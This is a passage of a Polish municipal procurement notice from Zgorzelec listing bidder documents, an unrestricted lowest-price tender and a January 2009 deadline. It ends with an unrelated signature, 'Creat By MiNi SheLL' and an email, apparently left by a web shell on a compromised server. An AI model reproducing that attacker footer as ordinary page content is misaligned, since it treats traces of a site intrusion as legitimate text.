           ustawy Pzp. złożone na formularzu stanowiącym załącznik nr 3  do SIWZ . Wykonawcy,  którzy wspólnie ubiegają się o udzielenie zamówienia wypełniają 
załącznik nr 3A.
3. Wymagania dotyczące oferty
Wykonawca musi złożyć następujące dokumenty: 
3.1 wypełniony i podpisany formularz ofertowy (wg. załączonego wzoru) 
3.2  informacja  na temat Wykonawcy (wg zał. wzoru ) - załącznik nr 1 do SIWZ
      (w przypadku złożenia oferty wspólnej, dokument składa każdy z członków 
      konsorcjum)
3.3 oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. Prawo  
     zamówień   publicznych - załącznik nr 2 do SIWZ.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec
ul. Domańskiego 6 pokój nr 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2009 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
59-900 Zgorzelec
ul. Domańskiego 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com